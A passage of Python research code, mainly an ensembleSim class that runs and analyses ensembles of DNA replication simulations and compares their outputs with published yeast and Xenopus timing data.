simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("DNAs", root + "/" + simu + "/" + "analysis.hdf5", two=two)
```
#### File: data/replication/ensembleSim.py
```python
from .simulate_1D import simulate
import numpy as np
import _pickle as cPickle
from collections import namedtuple
import os
from tqdm import tqdm
import pandas as pd
import h5py
import json
from scipy.stats import poisson
import copy
from replication.tools import load_ori_position, load_lengths_and_centro
class ensembleSim:
def __init__(self, Nsim, Nori, Ndiff, lengths,
p_on, p_off, only_one, all_same_ori=True,
dt_speed=1,
fork_speed=1,
gindin=True,
p_v=1,
l_ori=[], cut=10, random=False, one_minute=False,
positions=None, ramp=None,
max_ramp=None, ramp_type="linear", strengths=[], hdf5_file=None,
D_Ndiff="pulse", fsd="uniform", variance_fs=2):
self.Nsim = Nsim
self.Nori = Nori
self.Ndiff = Ndiff
self.lengths = lengths
if type(lengths) == str:
print("Lengths = %s" % lengths)
raise
if lengths and type(lengths[0]) == list:
print("lengts = ", lengths)
print("But should be a list")
raise
assert(type(gindin) == bool)
assert(type(only_one) == bool)
self.p_on = p_on
self.p_off = p_off
self.only_one = only_one
self.all_same_ori = all_same_ori
self.dt_speed = dt_speed
self.fork_speed = fork_speed
self.gindin = gindin
self.p_v = p_v
self.cut = cut
self.l_ori = l_ori
self.random = random
self.one_minute = one_minute
self.positions = positions
self.ramp = ramp
self.max_ramp = max_ramp
self.ramp_type = ramp_type
self.strengths = strengths
self.hdf5_file = None
self.D_Ndiff = D_Ndiff
self.fsd = fsd
self.variance_fs = variance_fs
def add_precomputed(self, name, file_hdf5="None", precision=None, two=False):
qt = getattr(self, name)()
with h5py.File(file_hdf5, 'a') as myfile:
quant = myfile.get("analysis")
if myfile.get("analysis") is None:
quant = myfile.create_group("analysis")
if quant.get(name) is not None:
print(name, "Allready computed")
return
# print(quant.get(name))
# print(type(qt[0]))
if qt != [] and type(qt) in [tuple, list] and type(qt[0]) in[list, np.ndarray]:
prop = quant.create_group(name)
if precision:
prop.create_dataset("precision", data=precision)
maxi = None
if two:
maxi = 2
for i in range(len(qt[:maxi])):
if precision:
prop.create_dataset(str(i), data=list(
map(lambda x: int(x * precision), qt[i])))
else:
prop.create_dataset(str(i), data=np.array(qt[i]))
else:
prop = quant.create_dataset(name, data=qt)
def show_parameters(self, show_ori=True):
P = ["Nsim", "Nori", "Ndiff", "lengths", "p_on", "p_off",
"only_one", "all_same_ori", "dt_speed",
"fork_speed", "gindin", "p_v", "cut", "l_ori", "ramp", "max_ramp"]
for parameter in P:
if (parameter == "l_ori" or parameter == "Nori") and not show_ori:
print(parameter, self.nori)
continue
if hasattr(self, parameter):
print(parameter, getattr(self, parameter))
else:
print(parameter, "Not defined")
def data(self):
return [self.aIts,
self.aFts,
self.aFds,
self.aRps,
self.aDNAs,
self.raDNAs,
self.aUnrs,
self.aFree_origins]
def n3Dsim(self):
v = self.try_load_property("n3Dsim")
if v is not None:
return v
return len(self.aIts)
def load_data(self, data):
self.aIts, self.aFts, self.aFds, self.aRps, self.aDNAs, self.raDNAs, self.aUnrs, self.aFree_origins = data
unr = np.sum(np.array(self.aUnrs), axis=1)
self.anIts = self.aIts * unr
def remove_correlations(self):
del self.aIODs
del self.aIRTDs
del self.aTLs
def add_traj(self, N, run_length=10000):
old_nsim = 0 + self.Nsim
self.Nsim = N
self.run_all(init=False)
self.Nsim = old_nsim + N
def run_all(self, run_length=200, load_from_file=None, correlation=True, skip=[], single=False, init=True, orip=False):
if init:
self.aIts = []
self.aIfs = []
self.aFts = []
self.aFds = []
self.aRps = []
self.aDNAs = []
self.raDNAs = []
self.aUnrs = []
self.aFree_origins = []
self.aFree_Diff_bis = []
self.anIts = []
self.aFree_Diff = []
self.aFiring_Position = []
self.aIODs = []
self.aIRTDs = []
self.aTLs = []
self.record_diffusing = []
self.orip = []
self.aPol = []
self.fork_speeds = []
self.lft_forks = []
found = 0
for sim in tqdm(range(self.Nsim)):
ori = self.Nori
if self.l_ori != []:
ori = self.l_ori
# check dimension of position
positions = self.positions
if self.positions and type(self.positions[0][0]) is list:
positions = self.positions[sim]
strengths = self.strengths
if self.strengths and type(self.strengths[0][0]) is list:
strengths = self.strengths[sim]
Nd = self.Ndiff
max_ramp = self.max_ramp
if self.D_Ndiff == "poisson":
Nd = poisson.rvs(size=1, mu=self.Ndiff)[0]
max_ramp = Nd
if load_from_file is None:
S = simulate(ori,
Nd,
self.lengths,
self.p_on,
self.p_off,
self.only_one,
dt_speed=self.dt_speed,
fork_speed=self.fork_speed,
gindin=self.gindin,
p_v=self.p_v,
random=self.random,
positions=positions,
ramp=self.ramp,
max_ramp=max_ramp,
ramp_type=self.ramp_type,
strengths=strengths,
fsd=self.fsd,
variance_fs=self.variance_fs
)
S.simulate(run_length)
found += 1
self.record_diffusing.append(S.record_diffusing)
else:
# print("Sim", sim)
if sim in skip:
# print("skip", skip)
continue
# print(sim)
Simu = namedtuple("Simu", ["polys", "oris", "Ndiff_libre_t", "record_diffusing"])
troot = "%s%i/" % (load_from_file, sim + 1)
if single:
troot = load_from_file
file_to_open = troot + "polymer_timing.dat"
try:
if os.path.exists(file_to_open):
with open(file_to_open, "rb") as f:
polys = cPickle.load(f)
oris = [np.array(p.origins) - p.start for p in polys]
Ndiff_libre_t = []
if os.path.exists(troot + "Ndiff_libre_t.dat"):
with open(troot + "Ndiff_libre_t.dat", "rb") as f:
Ndiff_libre_t = cPickle.load(f)
record_diffusing = []
if os.path.exists(troot + "record_diffusing.dat"):
with open(troot + "record_diffusing.dat", "rb") as f:
record_diffusing = cPickle.load(f)
self.record_diffusing.append(record_diffusing)
S = Simu(polys, oris, Ndiff_libre_t, record_diffusing)
found += 1
else:
print(file_to_open, "does not exist")
continue
except EOFError:
print("Not all files in %i readable" % sim)
if found == 1 and self.all_same_ori:
self.l_ori = S.oris
unfinished = False
self.aRps.append([])
for poly in S.polys:
if self.one_minute:
dt = 1
else:
dt = self.dt_speed
if not hasattr(poly, "dt"):
poly.dt = self.dt_speed
poly.max_fs = self.fork_speed
try:
self.aRps[-1].append(poly.get_replication_profile())
if np.any(self.aRps[-1][0] == 0):
print(self.aRps[-1])
raise TypeError
except TypeError:
unfinished = True
print("Sim %i not finished" % sim)
break
if unfinished:
self.aRps.pop(-1)
continue
self.aIts.append([])
self.aIfs.append([])
self.anIts.append([])
self.aFts.append([])
self.aFds.append([])
self.aDNAs.append([])
self.raDNAs.append([])
self.aUnrs.append([])
self.aFree_Diff.append([])
self.aFree_origins.append([])
self.aFree_Diff_bis.append([])
self.aFiring_Position.append([])
self.aIODs.append([])
self.aIRTDs.append([])
self.aTLs.append([])
self.aPol.append([])
self.fork_speeds.append([])
self.lft_forks.append([])
for poly in S.polys:
if orip:
p = poly.get_ori_position()
p.sort()
self.orip.append(p)
print(p)
dt = self.dte # if self.one_minute == 1
# Cut == 0 because we removed them from all the chromosomes
ft, it = poly.get_firing_time_It(cut=0, normed=False, dt=dt)
fd = poly.get_fork_density(cut=0, normed=False, dt=dt) # Normed afteward
self.aIts[-1].append(it)
self.aFts[-1].append(ft)
self.aFds[-1].append(fd)
dnat, _, pol = poly.get_DNA_with_time(dt=dt, polarity=True)
self.raDNAs[-1].append(dnat)
self.aPol[-1].append(pol)
if correlation:
iods, irtds, tls = poly.get_correlations(dt=dt, thresh=0.99)
self.aIODs[-1].append(iods)
self.aIRTDs[-1].append(irtds)
self.aTLs[-1].append(tls)
fsp, lft = poly.get_speeds_lifetime()
self.fork_speeds[-1].extend(fsp)
self.lft_forks[-1].extend(lft)
# if hasattr(poly, "fork_speeds"):
# self.fork_speeds[-1].extend(poly.fork_speeds)
"""
All the following line to be able to compute No(t-1)
"""
# print(self.aUnrs[-1][-1])
# .append(poly.get_DNA_with_time(fork_speed=self.fork_speed)[0])
# print(self.raDNAs[-1][-1][-1])
Free_o = poly.get_free_origins_time(normed=False, dt=dt).tolist()
assert (Free_o[-1] == 0)
self.aFree_origins[-1].append(np.array([len(poly.origins)] + Free_o[:-1]))
# self.aFree_origins[-1].append(Free_o)
# print(self.aFree_origins[-1])
# assert(1 == 0)
"""
len_poly = poly.end + 1 - poly.start
assert(self.raDNAs[-1][-1][-1] == len_poly)
self.raDNAs[-1][-1] = self.raDNAs[-1][-1].tolist()
self.raDNAs[-1][-1].pop(0)
self.raDNAs[-1][-1].append(len_poly)
self.raDNAs[-1][-1] = np.array(self.raDNAs[-1][-1])
# print(self.raDNAs[-1][-1])
# self.aUnrs[-1][-1] = self.aUnrs[-1][-1]
"""
len_poly = poly.end + 1 - poly.start
self.aUnrs[-1].append(len_poly - self.raDNAs[-1][-1])
ftime, firing_position = poly.get_dist_between_activated_origins(dt=dt)
self.aFiring_Position[-1].append(firing_position)
# print (norm.shape,self.aUnrs[-1][-1].shape)
# raise
# print(it)
DNA_time = np.sum(np.array(self.raDNAs[-1]), axis=0) / np.sum(self.lengths)
try:
for t in range(len(DNA_time)):
tp = int(round(t * dt / self.dt_speed, 0))
if tp > len(S.Ndiff_libre_t) - 1:
break
self.aFree_Diff_bis[-1].append(S.Ndiff_libre_t[tp])
except:
# Not available in 3D
pass
"""
try:
self.aFree_Diff[-1] = S.get_free()
# print(self.aFree_Diff[-1])
except:
pass"""
bins = 100
for poly in S.polys:
self.aIfs[-1].append(poly.get_firing_at_fraction(DNA_time=DNA_time,
cut=0, bins=bins))
self.aIfs[-1] = np.sum(np.array(self.aIfs[-1]), axis=0) / \
(np.array(np.arange(0, 1, 1 / bins) + 1 / 100.) * self.length)[::-1]
# print (np.array(np.arange(0,1,1/bins) * np.sum(self.lengths))[::-1])
unr = np.sum(np.array(self.aUnrs[-1]), axis=0)
unr[unr == 0] = np.nan
self.anIts[-1] = np.sum(np.array(self.aIts[-1]), axis=0)
self.aIts[-1] = np.sum(np.array(self.aIts[-1]), axis=0) / unr
self.aFds[-1] = np.sum(np.array(self.aFds[-1]), axis=0) / self.length
self.aFree_origins[-1] = np.sum(np.array(self.aFree_origins[-1]), axis=0)
# print(self.raDNAs)
self.aDNAs[-1] = 1 + np.sum(np.array(self.raDNAs[-1]), axis=0) / self.length
return S
def get_what(self, what, fraction=[0, 1], max_track_length=None):
"""return an array which contain a concatenation by sim
for each sim it is an array which contain a list of the given quantity for evey time step
IOD, IRTD, or TL
"""
def recompute(what, tl, max_track_length):
res = []
for ich, ch in enumerate(what):
res.append([])
for ipos, spos in enumerate(ch):
# Go throug time
# print(spos)
# print(spos,)
if type(spos) is not list:
spos = [] + spos.tolist()
else:
spos = [] + spos
if spos == []:
res[-1].append([])
continue
spos.insert(0, 0)
pos = np.cumsum(spos)
# print(tl[ich][ipos])
keep = np.array(tl[ich][ipos]) < max_track_length
kpos = pos[np.array(keep, np.bool)]
pos = kpos[1:] - kpos[:-1]
res[-1].append(pos)
"""
if np.any(keep == False):
print(pos.shape, keep.shape, pos[keep].shape)
print(len(res[-1][-1]), len(ch[ipos]))
# print(spos, pos, keep, tl[ich][ipos])
print(res[-1][-1])
raise"""
# return
return np.array(res).T
iod3 = []
for sim in range(self.Nsim):
def get_by_time(what=what):
# print(sim)
iods = np.array(getattr(self, "a" + what + "s")[sim])
if max_track_length is not None:
tl = np.array(getattr(self, "aTLs")[sim])
tl = tl.T
iods = iods.T
iods2 = []
fraction_time = np.array(self.raDNAs[sim]).copy()
for ichl, chl in enumerate(self.lengths):
# Normalise to 1 by dividing by chromosome length
fraction_time[ichl] /= chl
to_keep = iods
if max_track_length is not None:
# print(tl[ich].shape)
to_keep = recompute(iods.T, tl.T, max_track_length)
# print(fraction_time.shape)
for ich, (ch_what, ch_fraction) in enumerate(zip(to_keep, fraction_time.T)):
# We go throug time and
# By chromosomes select where they match the selected fraction:
select = (ch_fraction >= fraction[0]) * (ch_fraction <= fraction[1])
# print(select)
# return
if np.sum(select) >= 2:
iods2.append(np.concatenate(ch_what[select]))
if np.sum(select) == 1:
# print(ch_what)
iods2.append(np.array(ch_what[select][0]))
"""
print(iods2[-1])
print(iods2[-2])
print(np.concatenate([[], []]).shape)
print(np.array([]).shape)
return"""
if np.sum(select) == 0:
iods2.append(np.array([]))
return iods2
iod3 += get_by_time()
return iod3
def get_cum_sum_hist(self, what, bins=100, fraction=[0, 1], max_track_length=None):
"""Cumulative histogram in a combing like fashion
as the time steps are all used and added together"""
if what != "ori":
data = self.get_what(what, fraction=fraction, max_track_length=max_track_length)
elif what == "ori":
data = [np.array(io)[1:] - np.array(io)[:-1] for io in self.l_ori]
m = []
for i in data:
m += i.tolist() # np.mean(i) for i in iod3 if i != [] ]
self.m = m
y, x = np.histogram(m, bins=bins, normed=True)
# hist(m,bins=100,normed=True,cumulative=-1,histtype='step')
y = np.array([0] + np.cumsum(y).tolist())
y /= y[-1]
# print(y[0], y[-1])
y = 1 - y
# plot( 5*(x[1:]/2+x[:-1]/2),y)
return x, y
def get_quant(self, name, shift=0, n_rep=None, cut=0):
if shift != 0:
print("You should not use it")
prop = getattr(self, name)
# print(prop)
times = self.get_times_replication(n_rep=n_rep)
# print(times)
# print(maxl)
if -1 in times:
maxl = int(max(map(len, prop)))
else:
maxl = int(max(times / self.dte))
if name == "aIfs":
maxl = len(prop[0])
normed_prop = np.zeros((len(prop[:n_rep]), maxl))
# print("Nan")
normed_prop += np.nan
for iIt, It in enumerate(prop[:n_rep]):
# print(len(It), maxl)
normed_prop[iIt, :min(len(It), maxl)] = np.array(It[:min(len(It), maxl)])
if cut != 0 and name in ["anIts", "aFds"]:
# Remove last cut:
# print("Before", normed_prop[iIt])
# print("la")
removed = 0
if cut != 0:
for i in range(1, len(normed_prop[iIt])):
while removed != cut and normed_prop[iIt][-i] > 0:
# print(i)
normed_prop[iIt][-i] = -1
removed += 1
if removed == cut:
normed_prop[iIt][-i:] = np.nan
break
# print("After", normed_prop[iIt])
if shift != 0:
normed_prop[iIt, len(It):] = It[-1]
self.all = normed_prop
x = np.arange(maxl)
if n_rep:
y = np.nanmean(normed_prop[:n_rep], axis=0)
err = np.std(normed_prop[:n_rep], axis=0)
else:
y = np.nanmean(normed_prop, axis=0)
err = np.std(normed_prop, axis=0)
return x * self.dte, y, err, normed_prop
def get_time(self, n_rep=None):
times = self.get_times_replication(n_rep=n_rep)
# print(times)
# print(maxl)
maxl = int(max(times / self.dte))
return np.arange(maxl) * self.dte
def get_times_replication(self, finished=True, n_rep=None):
v = self.try_load_property("get_times_replication")
if v is not None:
return v
times = []
for rep in self.aRps[:n_rep]:
times.append(-1)
for c in rep:
if finished and np.sum(np.equal(c, None)) != 0:
times[-1] = -1
break
else:
times[-1] = max(times[-1], max(np.array(c)[~np.equal(c, None)]))
# print(self.dte)
return np.array(times) # * self.dte
@property
def nori(self):
nori = 1.0 * np.sum(list(map(len, self.l_ori)))
if nori == 0:
print("Warning, no origins ")
return nori
@property
def length(self):
return np.sum(self.lengths)
@property
def dte(self):
if self.one_minute:
return 1
else:
return self.dt_speed
def try_load_property(self, name):
# print(name)
if hasattr(self, "hdf5_file") and self.hdf5_file is not None:
with h5py.File(self.hdf5_file, 'r') as myfile:
quant = myfile.get("analysis")
if quant is not None:
prop = quant.get(name)
# print(prop, hasattr(prop, "shape"))
if hasattr(prop, "shape"):
return prop.value
# print(prop, dir(prop))
if prop is not None:
return [prop[str(i)].value for i in range(len(prop))]
return None
def get_dist_between_activated_origins(self, time=None):
"""Time in minutes"""
v = self.try_load_property("get_dist_between_activated_origins")
if v is not None:
return v
Dist = []
if time is None:
time = 1e8
else:
time = time # / self.dte
# print(time)
for fps in self.aFiring_Position:
for fp in fps:
fired = fp[::, 0] <= time
dist = fp[fired][::, 1]
dist = dist[1:] - dist[:-1]
Dist.extend(dist)
return Dist
def get_time_at_fraction(self, frac=1, bead=True):
dna = frac + 1
x, DNA = self.DNAs()[:2]
# print(DNA)
for iid, d in enumerate(DNA):
if d >= dna:
return x[iid]
return x[-1]
def Mean_replication_time(self, n_intervals=6):
v = self.try_load_property("Mean_replication_time")
if v is not None:
return v
def get_times_at_fraction(nsim, time, n_interval=6):
fracs = np.arange(0, 1.01, 1 / n_interval)
idna = 0
dna = fracs[idna] + 1
DNA = self.aDNAs[nsim]
times = []
# print(DNA)
for iid, d in enumerate(DNA):
if d >= dna:
# print(dna)
times.append(time[iid])
idna += 1
dna = fracs[idna] + 1
if dna >= 2:
times.append(time[-1])
break
return times
rep = []
cp = []
time = self.get_time()
#time, _, _, _ = self.get_quant("aDNAs")
for il, l in enumerate(self.lengths):
rep.append(np.zeros((n_intervals, l)))
Nsim = len(self.aRps)
for sim in range(Nsim):
intervals = get_times_at_fraction(sim, time)
#print("int", intervals, len(time))
# print(self.aRps[sim][il])
for iinte, (end, start) in enumerate(zip(intervals[1:], intervals[:-1])):
pos = (self.aRps[sim][il] <
end) & (self.aRps[sim][il] > start)
# print(pos)
rep[-1][iinte, pos] += 1
cp.append(copy.deepcopy(rep[-1]))
cp[-1] = cp[-1] / np.sum(cp[-1], axis=0)
tmp = np.zeros_like(cp[-1])
for i in range(1, n_intervals + 1):
tmp[i - 1, ::] = i
toc = cp[-1] * tmp * 6 / 5 - 1 / 5
mcp = np.mean(toc, axis=0)
std = np.mean((toc - mcp)**2, axis=0)**0.5
cp[-1] = [mcp, std]
return rep, cp
def It_Mean_field_origins(self, n_rep=None):
v = self.try_load_property("It_Mean_field_origins")
if v is not None:
return v
x, y = self.Free_Diff_bis(n_rep=n_rep)[:2]
x, y1 = self.Free_origins(n_rep=n_rep)[:2]
x, DNA = self.DNAs(n_rep=n_rep)[:2]
Unr = (2 - DNA) * self.length
return x, y * y1 / Unr * self.p_on * self.p_v / self.dt_speed
def It_Mean_field_simplified(self, n_rep=None):
v = self.try_load_property("It_Mean_field_simplified")
if v is not None:
return v
x, y = self.Free_Diff_bis(n_rep=n_rep)[:2]
# print(self.nori, self.length)
return x, y * self.nori / self.length * self.p_on * self.p_v / self.dt_speed
def get_rep_profile(self, allp=True):
v = self.try_load_property("get_rep_profile")
if v is not None:
return v
rep = []
repall = []
for il, l in enumerate(self.lengths):
rep.append(np.zeros(l))
repall.append([])
Nsim = len(self.aRps)
for sim in range(Nsim):
rep[il] += np.array(self.aRps[sim][il]) / Nsim
repall[-1].append(np.array(self.aRps[sim][il]))
if allp:
return rep, repall
return rep
def get_mean_copie(self, time):
copie = []
std_copie = []
rep_t = self.get_times_replication()
for il, l in enumerate(self.lengths):
# print(l)
Nsim = len(self.aRps) - rep_t.tolist().count(-1)
copie.append(np.ones((Nsim, l)))
for sim, time_rep in enumerate(rep_t):
if time_rep != -1:
# print("th")
copie[il][sim, np.array(self.aRps[sim][il] * self.dte) < time] = 2
sim += 1
std_copie.append(np.std(copie[il], axis=0))
copie[il] = np.mean(copie[il], axis=0)
return copie, std_copie
def Its(self, n_rep=None, recompute=False, cut=0):
v = self.try_load_property("Its")
if v is not None:
# print("Pre")
return v
if cut != 0 and recompute is False:
print("Warning Its does not consider cut")
elif cut != 0 and recompute is True:
print("Cut Its considered")
if recompute:
NF = self.get_quant("anIts", n_rep=n_rep, cut=cut)[3]
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, _, _, Unr = self.get_quant("tUNrs", n_rep=n_rep)
Unr[Unr == 0] = np.nan
y = np.nanmean(NF / Unr, axis=0)
# Unr[Unr == 0] = 1
return x, y, np.mean(NF, axis=0), np.nanmean(NF, axis=0) / np.nanmean(Unr, axis=0)
else:
x, y, std, alls = self.get_quant("aIts", n_rep=n_rep)
# As this are cumulative properties, this scale for one minute
return x, y / self.dte, std, alls
def Ifs(self, n_rep=None, recompute=False, cut=0):
if recompute == True:
print("Sorry not the good one implemented")
return
if cut != 0 and recompute == False:
print("Warning Ifs does not consider cut")
elif cut != 0 and recompute == True:
print("Cut Ifs considered")
if recompute:
self.get_quant("anIts", n_rep=n_rep)
Nori = self.all + 0
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x = self.get_quant("tUNrs", n_rep=n_rep)[0]
Unr = self.all + 0
meanurn = np.mean(Unr, axis=0)
Unr[Unr == 0] = np.nan
y = np.nanmean(Nori / Unr, axis=0)
Unr[Unr == np.nan] = 0
# Unr[Unr == 0] = 1
return x, y, np.mean(Nori, axis=0), meanurn, Unr
else:
return self.get_quant("aIfs", n_rep=n_rep)
def nIts(self, n_rep=None):
return self.get_quant("anIts", n_rep=n_rep)
def MeanIts(self, n_rep=None, cut=0):
v = self.try_load_property("MeanIts")
if v is not None:
return v
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, Nf, std, alls = self.get_quant("anIts", n_rep=n_rep, cut=cut)
x, Unr, std, allsu = self.get_quant("tUNrs", n_rep=n_rep)
# allsu[allsu == 0] = np.nan
print(np.nansum(alls[np.isnan(allsu)]))
# alls[np.isnan(allsu)] = np.nan
allsu[np.isnan(allsu)] = 0
alls[np.isnan(alls)] = 0
return x, Nf / Unr / self.dt_speed, np.nanmean(alls / allsu, axis=0) / self.dt_speed, np.nanmean(alls, axis=0) / np.nanmean(allsu, axis=0) / self.dt_speed
def passi(self):
v = self.try_load_property("passi")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
ori_loss = Nori_libre[:-1] - Nori_libre[1:]
# plot(x[:-1],ori_loss)
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
passivated = ori_loss - activated[:-1]
return x[:-1], passivated
def Pol(self):
v = self.try_load_property("Pol")
if v is not None:
return v
rep = []
repall = []
for il, l in enumerate(self.lengths):
rep.append(np.zeros(l))
repall.append([])
Nsim = len(self.aPol)
for sim in range(Nsim):
rep[il] += np.array(self.aPol[sim][il]) / Nsim
return rep
def acti(self):
v = self.try_load_property("acti")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
# plot(x[:-1],passivated,label="passivated")
# legend()
# figure()
return x[:-1], activated[:-1]
def passi_acti(self):
v = self.try_load_property("passi_acti")
if v is not None:
return v
x, Nori_libre = self.Free_origins()[:2]
ori_loss = Nori_libre[:-1] - Nori_libre[1:]
# plot(x[:-1],ori_loss)
x, activated = self.nIts()[:2]
# plot(x,activated,label="Activated")
passivated = ori_loss - activated[:-1]
# plot(x[:-1],passivated,label="passivated")
# legend()
# figure()
return x[:-1], passivated / activated[:-1]
def ItsDifferentWay(self, cut=0):
pass
def Fds(self, n_rep=None):
v = self.try_load_property("Fds")
if v is not None:
return v
return self.get_quant("aFds", n_rep=n_rep)
def Free_Diff(self, n_rep=None):
v = self.try_load_property("Free_Diff")
if v is not None:
return v
return self.get_quant("aFree_Diff", n_rep=n_rep)
def rho_ori(self, n_rep=None):
v = self.try_load_property("rho_ori")
if v is not None:
return v
self.tUNrs = np.sum(np.array(self.aUnrs), axis=1)
x, _, _, Unr = self.get_quant("tUNrs", n_rep=n_rep)
Unr[Unr == 0] = np.nan
x, _, _, Nori_libre = self.Free_origins()
return x, np.nanmean(Nori_libre / Unr, axis=0)
def Rps(self, n_rep=None):
return self.get_quant("aRps", n_rep=n_rep)
def DNAs(self, n_rep=None):
v = self.try_load_property("DNAs")
if v is not None:
return v
return self.get_quant("aDNAs", n_rep=n_rep)
def Free_origins(self, n_rep=None):
return self.get_quant("aFree_origins", n_rep=n_rep)
def Free_Diff_bis(self, n_rep=None):
v = self.try_load_property("Free_Diff_bis")
if v is not None:
return v
return self.get_quant("aFree_Diff_bis", n_rep=n_rep)
def n_activated_oris(self):
return list(map(len, np.concatenate(self.aFts)))
def error_DNA_time(self, plot=False, shift=0):
# https://academic.oup.com/nar/article/42/1/e3/2437422/The-dynamics-of-genome-replication-using-deep
point = [(4.3714285714285808, 1.0420168067226889), (9.2571428571428562, 1.0126050420168067), (14.40000000000002, 1.0714285714285714), (17.228571428571435, 1.0420168067226889), (19.800000000000015, 0.97058823529411764), (24.428571428571431, 0.96218487394957974), (30.085714285714289, 0.97478991596638642), (32.657142857142873, 1.0714285714285714), (34.71428571428573, 1.1596638655462184), (37.028571428571425, 1.2983193277310923),
(39.85714285714284, 1.3277310924369747), (42.428571428571445, 1.3067226890756303), (44.48571428571428, 1.5462184873949578), (46.800000000000026, 1.588235294117647), (49.371428571428581, 1.6470588235294117), (54.771428571428551, 1.672268907563025), (59.914285714285718, 1.8613445378151261), (69.942857142857122, 1.9957983193277311), (79.971428571428589, 1.9495798319327733), (89.742857142857147, 1.8781512605042017)]
# x_exp,y_exp = zip(*point)
x, y, std, alls = self.DNAs()
error = 0
Np = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i])**2
Np += 1
if plot:
return zip(*point)
return error, Np
def error_FD_time(self, plot=False, shift=0):
point = [(250, 0.025), (500, 0.1), (1000, 0.2), (1250, 0.13),
(1500, 0.09), (2000, 0.01)] # Goldar 2008 (/kb)
point = [(time / 60, value) for time, value in point]
x, y = self.Fds()[: 2]
error = 0
Np = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i])**2
Np += 1
if plot:
return zip(*point)
return error, Np
def error_firing_time(self, plot=False, specie="yeast", coarse=1, arach=False, smooth=1):
# Universal Temporal Prrofile of Replication Origin (Goldar)
if not specie in ["yeast", "xenope"]:
raise
point = [(5, 0.01), (13, 0.02), (16, 0.04), (20, 0.07), (25, 0.02),
(30, 0.01)] + [(i, 0) for i in range(31, 70, 2)] # xenoput
unity = 1 # we want it by minutes
point = [(time, value * unity) for time, value in point]
if specie == "yeast":
point = [11.104005791505799, 0.00018581081081081065,
12.066008316008308, 0.00020270270270270323,
13.165837540837543, 0.00023648648648648667,
13.990477427977439, 0.0002533783783783784,
15.0921629046629, 0.0003547297297297296,
16.05787793287793, 0.0005067567567567568,
17.161883724383713, 0.0006925675675675674,
18.127134689634687, 0.0008277027027027029,
19.092849717849717, 0.0009797297297297301,
20.19592738342739, 0.0011317567567567573,
21.159786159786165, 0.001216216216216216,
22.1227168102168, 0.001266891891891892,
23.22393822393822, 0.0013513513513513514,
24.191509504009503, 0.001570945945945946,
25.298763736263723, 0.001875,
26.407410157410155, 0.0022297297297297295,
27.233442233442233, 0.0022972972972972973,
28.46970596970597, 0.0022972972972972973,
29.431244431244423, 0.0022972972972972973,
30.402528215028198, 0.0026520270270270273,
31.514887139887136, 0.0031418918918918915,
32.35437704187704, 0.003699324324324324,
33.59156890406891, 0.003733108108108108,
34.55125111375111, 0.0036655405405405404,
35.50907707157708, 0.003530405405405405,
36.614475051975035, 0.0037668918918918916,
37.723121473121466, 0.004121621621621621,
38.69208494208493, 0.004391891891891891,
39.65640778140778, 0.004493243243243243,
40.747419809919805, 0.004206081081081081,
41.696892634392626, 0.0037668918918918916,
42.666320166320176, 0.004054054054054054,
43.775894713394706, 0.004442567567567567,
44.73279254529254, 0.004273648648648648,
45.82380457380458, 0.003986486486486486,
46.62338506088507, 0.003091216216216216,
47.83180501930502, 0.0020777027027027027,
48.78591847341846, 0.0018074324324324326,
49.72425378675379, 0.0009628378378378375,
50.65934065934067, 0,
51.75824175824175, 0,
52.85760692010692, 0.000016891891891892587,
53.81914538164537, 0.000016891891891892587,
54.780219780219795, 0,
56.15384615384616, 0,
57.11538461538461, 0,
57.93956043956044, 0]
point = np.array(point)
point = point.reshape(-1, 2)
if arach:
if specie == "yeast":
print(point.shape)
point = pd.read_csv("../../data/external/I2T_yeast.txt", sep=" ", header=None)
point[0] += 10
point = np.array(point)
print(point.shape)
if specie == "xenope":
A = pd.read_csv("../../data/external/I2T_exenope.txt", sep=" ", header=None)
A[0] = (A[0] - 20 * 60) / 60
A[1] = pd.rolling_mean(A[1], window=smooth) * 10
point = np.array(A)
x, y = self.Its()[: 2]
error = 0
Np = 0
shift = 0
for xe, ye in point:
if xe >= shift:
i = np.argmin((x - xe + shift)**2)
# print(x[i],xe)
error += (ye - y[i] / coarse)**2
Np += 1
if plot:
return zip(*point)
return error, Np
def xenope_prof(self, profile=True, which="mean", toplot=True, hour=False, kb=1, color=None, std=False):
import matplotlib.pyplot as plt
chro = 0
coarse = 1000
if profile:
if which == "mean":
Prof, allP = self.get_rep_profile(allp=True)
Prof = Prof[0]
allP = allP[0]
x = np.arange(len(Prof)) * coarse / 1000.
h = 1
if hour:
h = 1 / 60.
y = Prof * h
if toplot:
kwargs = {"label": "Simulated"}
if color is not None:
kwargs["color"] = color
if std:
#print(np.array(allP).shape, Prof.shape)
#print((np.mean((np.array(allP) - Prof)**2, axis=0)**0.5) * h)
plt.errorbar(x * kb, Prof * h,
(np.mean((np.array(allP) - Prof)**2, axis=0)**0.5) * h, errorevery=200, **kwargs)
plt.xlim(-10 * kb, (x[-1] + 10) * kb)
else:
plt.plot(x * kb, Prof * h, **kwargs)
plt.xlim(-10 * kb, (x[-1] + 10) * kb)
else:
for sim in which:
x = np.arange(len(self.aRps[sim][chro])) * coarse / 1000.
plt.plot(x, self.aRps[sim][chro])
top = self.aRps[sim][chro]
plt.xlim(-10, x[-1] + 10)
else:
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
if ikk == 0:
mean_C = mean_copie[kk][chro]
else:
mean_C += mean_copie[kk][chro]
x = np.arange(len(mean_C)) * coarse / 1000.
plt.plot(np.arange(len(mean_C)) * coarse / 1000., mean_C / len(k))
plt.xlim(-10, x[-1] + 10)
return x, y
def whole_genome_timing(self, coarse=5000, figsize=(12, 12), plot=True,
default_rep="../../data/external/time-coordinate.pick",
experiment=True, profile=False, which="mean", fig=None,
warning=True, ori=True, shift=0, N_chrom=range(16), strength_ori=None,
centro=False):
import matplotlib.pyplot as plt
with open(default_rep, "rb") as f:
times, coordinate = cPickle.load(f)
times.keys()
time_p = list(times.keys())
time_p.sort()
dna = []
for t in time_p:
dna.append(np.concatenate(times[t]).mean())
